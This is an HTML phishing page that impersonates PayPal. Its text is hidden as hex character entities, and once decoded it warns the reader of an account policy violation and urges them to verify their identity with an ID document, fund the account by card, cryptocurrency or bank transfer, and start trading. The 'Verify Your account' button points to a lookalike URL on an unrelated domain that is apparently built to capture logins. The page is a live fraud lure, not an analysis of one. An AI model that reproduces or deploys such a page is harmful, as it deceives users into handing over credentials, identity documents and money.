<html>
<head>
 
 <style>
.contentContainer {
    position: relative;
    width: 400px;
    margin: 135px auto 0 auto;
    margin-top: 135px;
    margin-right: auto;
    margin-bottom: 0px;
    margin-left: auto;
    padding: 0;
    padding-top: 0px;
    padding-right: 0px;
    padding-bottom: 0px;
    padding-left: 0px;
    background-color: #fff;
}
.logo {
    margin: 0 auto;
    background: transparent url(https://www.paypalobjects.com/images/shared/monogram@2x.png) top center no-repeat;
    -moz-background-size: 50px 50px;
    background-size: 30px 37px;
    width: 100px;
    height: 60px;
    display: block;
    text-indent: -999em;
}
#ktba {
    display: block;
    margin: 0 0 10px;
    font-family: "pp-sans-big-light", Helvetica Neue, Arial, sans-serif;
    font-weight: normal;
    font-variant: normal;
    font-size: 2em;
    color: #015973;
	-webkit-margin-before: 0.67em;
    -webkit-margin-after: 0.67em;
    -webkit-margin-start: 0px;
    -webkit-margin-end: 0px;
	
}
html {
    background-color: #fff;
    position: relative;
    min-height: 100%;
}
body {
    min-height: 100%;
    margin: 0 0 119px;
    padding: 0;
    color: #2c2e2f;
    font-family: "pp-sans-small-regular", Helvetica Neue, Arial, sans-serif;
    font-weight: normal;
    font-variant: normal;
    font-size: 93.75%;
    -webkit-font-smoothing: antialiased;
    -webkit-backface-visibility: hidden;
    -moz-text-size-adjust: 100%;
    -ms-text-size-adjust: 100%;
    /* -webkit-text-size-adjust: 100%; */
}
footer {
    position: absolute;
    bottom: 0;
    left: 0;
    width: 100%;
    height: 119px;
}
.chal {
    text-align: left;
    border-top: 1px solid #e5e8ea;
    border-top-width: 1px;
    border-top-style: solid;
    border-top-color: rgb(229, 232, 234);
}
.doui {

    width: 100%;
    height: 50px;
    padding: 16px;
    padding-top: 16px;
    padding-right: 16px;
    padding-bottom: 16px;
    padding-left: 16px;
    border: 0;
    display: block;
    background: #0070ba;



}
footer ul {
    position: absolute;
    list-style-type: none;
    height: 42px;
    bottom: 0;
    width: 100%;
    text-align: center;
    background-color: #f7f9fa;
}
footer ul li:first-child {
    background: none;
    background-image: none;
    background-position-x: initial;
    background-position-y: initial;
    background-size: initial;
    background-repeat-x: initial;
    background-repeat-y: initial;
    background-attachment: initial;
    background-origin: initial;
    background-clip: initial;
    background-color: initial;
}
footer ul li {
    display: inline-block;
    margin: 0;
    margin-top: 0px;
    margin-right: 0px;
    margin-bottom: 0px;
    margin-left: 0px;
    padding: 15px 0 15px .4em;
    padding-top: 15px;
    padding-right: 0px;
    padding-bottom: 15px;
    padding-left: 0.4em;
    font-size: 0.73333333em;
}
footer ul li {
    display: inline-block;
    margin: 0;
    margin-top: 0px;
    margin-right: 0px;
    margin-bottom: 0px;
    margin-left: 0px;
    padding: 15px 0 15px .4em;
    padding-top: 15px;
    padding-right: 0px;
    padding-bottom: 15px;
    padding-left: 0.4em;
    font-size: 0.73333333em;
}
footer ul li {
    display: inline-block;
    margin: 0;
    margin-top: 0px;
    margin-right: 0px;
    margin-bottom: 0px;
    margin-left: 0px;
    padding: 15px 0 15px .4em;
    padding-top: 15px;
    padding-right: 0px;
    padding-bottom: 15px;
    padding-left: 0.4em;
    font-size: 0.73333333em;
}

</style>

</head>
<body>
<br>
<br>
<center>

<div class="contentContainer" id="content"><div><div id="challenges" class="textCenter challenges panel">
  <div class="logo" ></div>
<br>
<img src="https://image.flaticon.com/icons/png/512/62/62667.png" alt="alternatetext"style="width:200px;height:150px;">
<h1 id="ktba">&#x56;&#x65;&#x72;&#x69;&#x66;&#x79;&#x20;&#x59;&#x6F;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;.</td>
<br>
<p style="color:#0FA1DF;font-size:27px;font-family:verdana,arial;">
</p>

<span style="font-family:Arial;font-size:20px;color: #1f1e1e;">&#x41;&#x66;&#x74;&#x61;&#x72;&#x20;&#x61;&#x20;&#x72;&#x65;&#x63;&#x65;&#x6E;&#x74;&#x20;&#x72;&#x65;&#x76;&#x69;&#x65;&#x77;&#x20;&#x6F;&#x66;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;&#x20;&#x61;&#x63;&#x74;&#x69;&#x76;&#x69;&#x74;&#x79;.
&#x77;&#x65;'&#x76;&#x65;&#x20;&#x64;&#x65;&#x74;&#x65;&#x6D;&#x69;&#x6E;&#x65;&#x64;&#x20;&#x79;&#x6F;&#x75;&#x20;&#x61;&#x72;&#x65;&#x20;&#x69;&#x6E;&#x20;&#x76;&#x69;&#x6F;&#x6C;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x20;&#x6F;&#x66;
&#x70;&#x61;&#x79;&#x70;&#x61;&#x6C;'&#x73;&#x20;&#x41;&#x63;&#x63;&#x65;&#x70;&#x74;&#x61;&#x62;&#x6C;&#x65;&#x20;&#x55;&#x73;&#x65;&#x72;&#x20;&#x50;&#x6F;&#x6C;&#x69;&#x63;&#x79;.&#x20;&#x70;&#x6C;&#x65;&#x61;&#x73;&#x65;&#x20;&#x6C;&#x6F;&#x67;&#x69;&#x6E;
&#x74;&#x6F;&#x20;&#x63;&#x6F;&#x6E;&#x66;&#x69;&#x72;&#x6D;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x69;&#x64;&#x65;&#x6E;&#x74;&#x69;&#x74;&#x79;&#x20;&#x61;&#x6E;&#x64;&#x20;&#x72;&#x65;&#x76;&#x69;&#x65;&#x77;&#x20;&#x61;&#x6C;&#x6C;&#x20;&#x79;&#x6F;&#x75;&#x72;
&#x72;&#x65;&#x63;&#x65;&#x6E;&#x74;&#x20;&#x61;&#x63;&#x74;&#x69;&#x76;&#x69;&#x74;&#x79;

<br></span>
<ul class="chal"></ul>
<p style="color:#000;font-size:20px;font-family:verdana,arial;">1.&#x56;&#x65;&#x72;&#x69;&#x66;&#x79;&#x20;&#x59;&#x6F;&#x75;&#x72;&#x20;&#x69;&#x64;&#x65;&#x6E;&#x74;&#x69;&#x74;&#x79;.

<span style="font-family:Arial;font-size:16px;color: #1f1e1e;">&#x47;&#x72;&#x61;&#x62;&#x20;&#x59;&#x6F;&#x75;&#x72;&#x20;&#x69;&#x64;&#x65;&#x6E;&#x74;&#x69;&#x74;&#x79;&#x20;&#x64;&#x6F;&#x63;&#x75;&#x6&#x44;;&#x65;&#x6E;&#x74;&#x20;{&#x69;&#x6E;&#x74;&#x65;&#x6&#x44;;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x61;&#x6C;&#x20;&#x70;&#x61;&#x73;&#x73;&#x70;&#x6F;&#x72;&#x74;.&#x20;&#x6E;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x61;&#x6C;&#x20;&#x49;&#x44;&#x20;&#x63;&#x61;&#x72;&#x64;.&#x20;&#x6F;&#x72;&#x20;&#x64;&#x72;&#x69;&#x76;&#x65;&#x72;'&#x73;&#x20;&#x6C;&#x69;&#x63;&#x65;&#x6E;&#x73;&#x65;}.&#x61;&#x20;&#x70;&#x65;&#x6E;.&#x20;&#x61;&#x6E;&#x64;&#x20;&#x61;&#x20;&#x70;&#x6C;&#x61;&#x63;&#x65;&#x20;&#x6F;&#x66;&#x20;&#x70;&#x61;&#x70;&#x65;&#x72;.

&#x6C;&#x6F;&#x67;&#x20;&#x69;&#x6E;&#x20;&#x74;&#x6F;&#x20;&#x79;&#x6F;&#x75;&#x74;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;&#x20;&#x6F;&#x6E; <a href="#buttons" onclick="toggleHelpBox()" jstcache="0">&#x50;&#x61;&#x79;&#x61;&#x70;&#x6C;</a> &#x61;&#x6E;&#x64;&#x20;&#x66;&#x6F;&#x6C;&#x6C;&#x6F;&#x77;&#x20;&#x74;&#x68;&#x65;&#x20;&#x73;&#x74;&#x65;&#x70;-&#x62;&#x79;-&#x73;&#x74;&#x65;&#x70;&#x20;&#x76;&#x65;&#x72;&#x69;&#x66;&#x69;&#x63;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x20;&#x70;&#x72;&#x6F;&#x63;&#x65;&#x64;&#x75;&#x72;&#x65;.
<div style="text-align: center;">
<ul class="chal"></ul>

<p style="color:#000;font-size:20px;font-family:verdana,arial;">2.&#x46;&#x75;&#x6E;&#x64;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;
<span style="font-family:Arial;font-size:16px;color: #1f1e1e;"> &#x75;&#x73;&#x69;&#x6E;&#x67;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x64;&#x65;&#x62;&#x69;&#x74;&#x20;&#x6F;&#x72;&#x20;&#x63;&#x72;&#x65;&#x64;&#x69;&#x74;&#x20;&#x63;&#x61;&#x72;&#x64;.&#x20;&#x63;&#x72;&#x79;&#x70;&#x74;&#x6F;&#x63;&#x75;&#x72;&#x72;&#x65;&#x6E;&#x63;&#x79;.&#x20;&#x6F;&#x72;&#x20;&#x62;&#x61;&#x6E;&#x6B;&#x20;&#x74;&#x72;&#x61;&#x6E;&#x73;&#x74;&#x65;&#x72;
<ul class="chal"></ul>
<p style="color:#000;font-size:20px;font-family:verdana,arial;">3.&#x53;&#x74;&#x61;&#x72;&#x74;&#x20;&#x74;&#x72;&#x61;&#x64;&#x69;&#x6E;&#x67;.
<span style="font-family:Arial;font-size:16px;color: #1f1e1e;"> &#x4F;&#x6E;&#x63;&#x65;&#x20;&#x79;&#x6F;&#x75;&#x20;&#x68;&#x61;&#x76;&#x65;&#x20;&#x76;&#x65;&#x72;&#x69;&#x66;&#x69;&#x65;&#x64;,&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x65;&#x6E;&#x74;&#x69;&#x72;&#x65;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;&#x20;&#x69;&#x73;&#x20;&#x73;&#x65;&#x74;&#x20;&#x74;&#x6F;&#x20;&#x74;&#x72;&#x61;&#x64;&#x65;.

<ul class="chal"></ul>
<img src="https://www.spiralpaper.com/v/vspfiles/assets/images/credit_card_payments_kb_700x300.jpg" alt="alternatetext"style="width:150px;height:50px;>

<div style="text-align: center;">
<a href="http://dreemhempoil.com/.www.paypal.com/paypal/" style="FONT-SIZE:14px;FONT-FAMILY:Arial;WIDTH:100%;COLOR:#fff;TEXT-ALIGN:center;DISPLAY:inline-block;BACKGROUND-COLOR:#0070ba;border-radius:50px;line-height:50px"><strong>
&#x56;&#x65;&#x72;&#x69;&#x66;&#x79;&#x20;&#x59;&#x6F;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;.</strong></a>

	</div>


</div>
</div>
</div>

</body>
</html>
